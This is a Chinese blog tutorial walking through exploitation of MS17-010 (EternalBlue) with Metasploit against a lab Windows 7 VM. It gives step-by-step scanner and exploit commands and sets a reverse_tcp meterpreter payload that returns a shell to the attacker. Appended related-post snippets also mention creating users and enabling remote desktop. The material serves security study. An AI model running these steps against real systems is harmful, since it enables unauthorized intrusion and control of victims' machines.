实战-使⽤msf渗透攻击ms17-010超级详细简单~

最新推荐文章于 2025-04-07 10:49:40 发布
最新推荐文章于 2025-04-07 10:49:40 发布
阅读量1.9k 收藏 15
点赞数 29
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_81881972/article/details/142916322
版权

实验内网渗透环境

Linux KALI:攻击机 192.168.40.171

win7 虚拟机:靶机 192.168.40.175

在此声明文章仅供相互学习参考,严禁利用于违法犯忌的事,任何事故自行承担!!

MSF(Metasploit Framework)是一种广泛使用的开源渗透测试工具,可以用来发现和利用系统中的安全漏洞。‌ MSF提供了一个全面的平台,用于执行安全测试、漏洞利用和后渗透测试。通过使用MSF,安全专业人员可以模拟黑客攻击,以评估系统的安全性并找出潜在的弱点。

利用的是:共享文件应用漏洞;分为:扫描阶段--攻击阶段--payloads--操作

        永恒之蓝(EternalBlue):

                 是漏洞利用程序(网络攻击工具),永恒之蓝利用windows系统的SMB漏洞可以获取系统最高权限。

        SMB协议(Server Message Block):

                它能被用于Web连接和客户端与服务器之间的信息沟通,SMB通过windows的共享文件应用端口号(主要通信端口:445)进行信息沟通。

MS17-010(永恒之蓝漏洞):

利用SMB协议的缓冲区溢出漏洞,通过覆盖其他内存区域,实现远程的命令注入。

    扫描阶段:kali攻击机通过445端口号向windows靶机发送TCP报文,扫描查看是否存在ms17-010漏洞
    攻击阶段:kali通过共享文件应用端口号445,对win7(靶机)发送SMB报文进行攻击,建立连接
    payloads(建立连接):win7(靶机)进行监控的数据包通过444端口号传输到kali(攻击机)中,建立稳定连接 ---攻击载荷,可返回shell(bash或cmd),进行程序注入等
    在攻击机进行靶机操作:对靶机进行想要进行的一系列操作,eg、对靶机进行增删改查各种信息等操作

payload 模块:建立连接,攻击载荷 ,其作用:

        木马病毒将shell封装在(实现配置好的)通信协议数据包里,再返回给kali,其中payloads模块就是所使用的通信协议(通信规则),返回时就需要用这个payloads模块进行解析

        同时建立好session回话后,payloads模块还需要封装由目标机所需要执行的命令发送出

正向shell是指攻击机主动连接靶机,并取得shell。通俗点说就是靶机自己绑定某个端口,等攻击机连接后将收到的数据给bash或cmd(后文简称shell),执行结果再丢给攻击机。

        影响:恶意代码会扫描开放文件共享端口(端口号:445)的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

通过 msf 模块获取 Win7 主机远程 shell

常⽤⽅法:

msfdb run     #进⼊框架
search ms17_010     # 使⽤search命令查找相关漏洞
use exploit/windows/smb/ms17_010_eternalblue      # 使⽤use进⼊模块
info      #使⽤info查看模块信息
set payload windows/x64/meterpreter/reverse_tcp     #设置攻击载荷
show options     #查看模块需要配置的参数
set RHOST 192.168.xxx.xxx     #设置参数
exploit / run      #攻击
后渗透阶段      #后渗透阶段

好了,我们已经了解的差不多了,开始行动!

---------------------------------------------------------------------------------------------------------------------------------

一,使⽤辅助模块进⾏漏洞扫描

1.msfdb run #进⼊msf

2.search ms17_010

二,使⽤模块,进⾏配置

1.use auxiliary/scanner/smb/smb_ms17_010     # 使⽤模块或者使⽤use 1

2.show options    # 查看配置

3.set rhosts 192.168.40.175      # 配置rhosts 受害者IP地址

三,执⾏ / 开始攻击

exploit #或者run命令执⾏攻击

注:有+号的就是可能存在漏洞的主机.

四,切换Exploit模块进⾏利⽤

(1)exploit攻击,获取目标主机shell

配置完成后开始执行 exploit [ɪkˈsplɔɪt 运用;利用;

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit ----攻击

注:如果等待没有出现 shell 提示符可以敲一下回车。

1.use exploit/windows/smb/ms17_010_eternalblue   # 使⽤攻击模块

2.show options    # 查看配置

3.set rhosts 192.168.40.175     # 设置受害者IP

4.set lhost 192.168.40.171     #设置反弹ip

5.show targets     #查看 exploit target ⽬标类型

6.run

7.无shell提示符,回车(此时直接执行都有目标主机shell)

注:攻击成功会进入meterpreter,此时输入shell进入对方的cmd,exit可退出meterpreter

【愚公系列】2023年05月 网络安全高级班 079.Kali Linux&Metasploit渗透测试(Metasploit漏洞用阶段)
时光隧道
05-31 7928
Metasploit实战通常可以分为三个阶段:信息搜集、漏洞用和提权。信息搜集阶段:在这个阶段中,渗透测试人员需要用各种可用的信息收集工具和技术收集目标系统的关键信息。这些信息可能包括目标系统的IP地址、端口、网络拓扑、服务和应用程序版本信息、操作系统、Web应用程序框架等等。漏洞用阶段:在这个阶段中,渗透测试人员使用已知的或自己发现的漏洞攻击目标系统。渗透测试人员使用Metasploit框架来执行攻击,并尝试获得对目标系统的访问权限。这个阶段中还可能包括密码破解和社会工程学等攻击技术。
msf通过win7“ms17-010:永恒之蓝”进行渗透测试
weixin_41023533的博客
11-24 3399
msf通过win7“ms17-010:永恒之蓝”进行渗透测试 一.查找该漏洞 二.使用该漏洞的探测模块(auxiliary/scanner/smb/smb_ms17_010),对目标主机进行‘是否存在该漏洞’的检查 三.使用该漏洞攻击模块进行攻击(use exploit/windows/smb/ms17_010_eternalblue) 四.创建新用户,并进行远程连接(方法一) 使用enable_rdp脚本开启远程桌面并创建用户 1.开启远程桌面:run post/windows/manage/en
kail环境下msf框架攻击ms17-010(永恒之蓝)漏洞演示
weixin_46447549的博客
04-23 7583
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言前言实验目的实验环境实验步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 前言 MS17-010(永恒之蓝)是一种操作系统漏洞,他的爆发源于WannaCry勒索病毒的诞生。该病毒是不法分子用NSA(National Secu.
使用msf(Metasploit Framework)检测MS17-010(永恒之蓝)
热门推荐
sanMu_blog的博客
07-02 1万+
今天是入职的第一天,还是有点忐忑,新地点新事物,希望自己的选择没有错,努力!废话不多说,入职后被安排的第一件事情,就是在Ubuntu环境下搭建msf(metasploit framework渗透框架),然后下午去做渗透测试。个人习惯Windows系统,于是在VMware内安装Ubuntu,由于电脑有VMware,具体的安装就不说了,Ubuntu安装教程本人参考的是Ubuntu安装教程,msf教程是...
ms17-010发现与攻击
2401_85054591的博客
04-06 340
使用use+编号使用搜索出来的模块use 3 使用分析模块,进行漏洞扫描。使用use0和set RHOSTS 10.225.91.12设置目标地址。输入shell进入命令行并使用chcp 65001解决乱码。打开kali虚拟机并切换root账户然后启动msf。执行run 或exploit执行脚本攻击use 3。发现10.225.91.12存在ms17-010用nmap扫描10.225.91.0/24。扫描发现存在ms17-010漏洞
MSF工具对MS17-010进行漏洞复现
weixin_63200026的博客
07-07 988
关于MS17-010永恒之蓝漏洞的实验,使用MSF进行漏洞复现
MSF复现 ms17_010(永恒之蓝)
beichenyyds的博客
03-01 2591
Metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。 MSF的更新 apt update apt install metasploit-
[内网渗透]---msf基础-永恒之蓝-ms17-010
嘿嘿嘿
09-16 1284
用户可以访问和使用 Metasploit 提供的各种功能和模块,包括漏洞用(exploits)、有效载荷(payloads)、辅助模块(auxiliary modules)、编码器(encoders)和后期用(post-exploitation)模块等。Metasploit(通常简称为MSF)是一个开源的渗透测试框架,包含大量的已知漏洞模块,可以用来攻击目标系统并获取控制权。use 0 ----使用第一个漏洞机制进入该模块 --自动进入--
Metasploit(MSF)使用教程(以ms17_010永恒之蓝为例)
天乐的博客
03-12 2697
Windows Vista、Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2012和Windows Server 2016等,用SMB协议(特别是SMBv1)的漏洞,需要目标系统开放了139或445端口。到此本文就结束了,本文仅介绍Metasploit的简单入门,更多功能自行学习探索,相信你会掌握这一款强大的渗透测试扫描神器,禁止非法扫描,后果自负。1.启动kali的nmap,探测一下靶标的455端口开放情况。
msfms17-010永恒之蓝漏洞
AI_SumSky的博客
06-27 7270
**** 1.熟悉msf的基本用法。 2.熟悉一些渗透中会用到基本的windows命令。 3.复现永恒之蓝漏洞。通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行。在Windows操作系统中,SMB服务默认是开启的,监听端口默认为445,因此该漏洞造成的影响极大。**** 1.打开MSF默认已经集成了MS17-010漏洞的测试模块 用search语法查找ms17-010 2.探测主机是否存在漏洞用use命令选择第三个测试接口,可探查主机是否存在永恒之蓝漏洞
ms17-010漏洞MSF
weixin_42373409的博客
09-10 741
ms17-010漏洞用 ## **实验环境** 1.kali linux(ip:192.168.131.131) 2.windows 7家庭版(ip:192.168.131.133、445端口开放) ## **用过程** 1.用nmap扫描目标主机的端口开放情况;
用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝)
Bulldozer_GD的博客
05-03 3102
用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝) 1.实验环境 虚拟机里面配置 kali 和 win7 在同一网段下,这里我设置的10.10.10.0/24: Kali linux 2019(10.10.10.131) Windows 7 X64 (10.10.10.130) 环境链接:[密码 :b79j](https...
漏洞复现之(MS17-010
weixin_56513549的博客
11-02 2963
永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。
ms17-010 发现与攻击
最新发布
2503_91549317的博客
04-07 598
3、远程登录:在你的本地机器上,打开“远程桌面连接”工具,输入目标IP地址和之前创建的用户名及密码(如 tzj/yourpassword),点击连接即可登录到目标机器。2、使用nmap进行基本扫描:输入以下命令来扫描目标网络中的活动主机和开放端口。3、进行端口和服务扫描:针对发现的活动主机,进一步扫描其开放端口和服务,以查找可能的漏洞。1、启用远程桌面服务:通过获得的shell,启用目标机器上的远程桌面服务。4、查看扫描结果:分析输出结果,寻找已知漏洞,如MS17-010等。
ms17-010 永恒之蓝
qq_62803993的博客
01-12 5412
什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
metasploit实战-ms17-010(永恒之蓝)漏洞用与复现
lucashu的博客
04-18 8928
本文目录永恒之蓝概述实验环境实验过程第一步:扫描漏洞第二步:渗透攻击第三步:漏洞用截屏 永恒之蓝概述 ms17-010(永恒之蓝)漏洞是由Shadow Brokers(影子经纪人)在2017年4月公布的大批漏洞之一,该漏洞用Windows系统的SMB漏洞可以获取系统最高权限。曾经席卷全球的Wanna cry勒索病毒就是不法分子基于该漏洞进行改造。 实验环境 攻击机:Kali Linux 攻击...
msfms17-010
02-25
### 使用 Metasploit 执行 MS17-010 漏洞用 #### 加载 EternalBlue Exploit 模块 为了针对 MS17-010 漏洞进行攻击或测试,在 Metasploit 中加载特定的 SMB 漏洞模块: ```bash msf6 > use exploit/windows/smb/ms17_010_eternalblue ``` 这一步骤选择了用于 Windows SMB 服务中的 MS17-010 漏洞——即著名的“永恒之蓝”漏洞攻击向量[^1]。 #### 设置目标和配置 Payload 一旦选定模块之后,设置目标机器的相关参数以及选择有效负载(Payload),默认情况下会选择 `windows/x64/meterpreter/reverse_tcp` 这种反向 TCP Meterpreter shell 类型的有效荷载: ```bash msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target_ip> msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <local_ip> ``` 这里 `<target_ip>` 是指代存在潜在漏洞的目标主机 IP 地址,而 `<local_ip>` 则是指本地监听地址以便接收来自受害者的连接请求[^3]。 #### 验证并运行 Exploit 完成上述准备工作后,可以通过命令来检查当前设定是否合理,并最终执行实际攻击操作: ```bash msf6 exploit(windows/smb/ms17_010_etternalblue) > check msf6 exploit(windows/smb/ms17_010_eternalblue) > run ``` 需要注意的是,“check” 功能并非总是能够准确判断远程系统的脆弱性状态;因此即使返回不确定的结果也值得一试 “run”。 #### 后渗透阶段 如果成功突破,则会获得一个交互式的 Meterpreter Shell 或者其他形式的访问权限。此时可以根据具体需求进一步开展后续行动,比如文件系统浏览、密码提取等高级功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值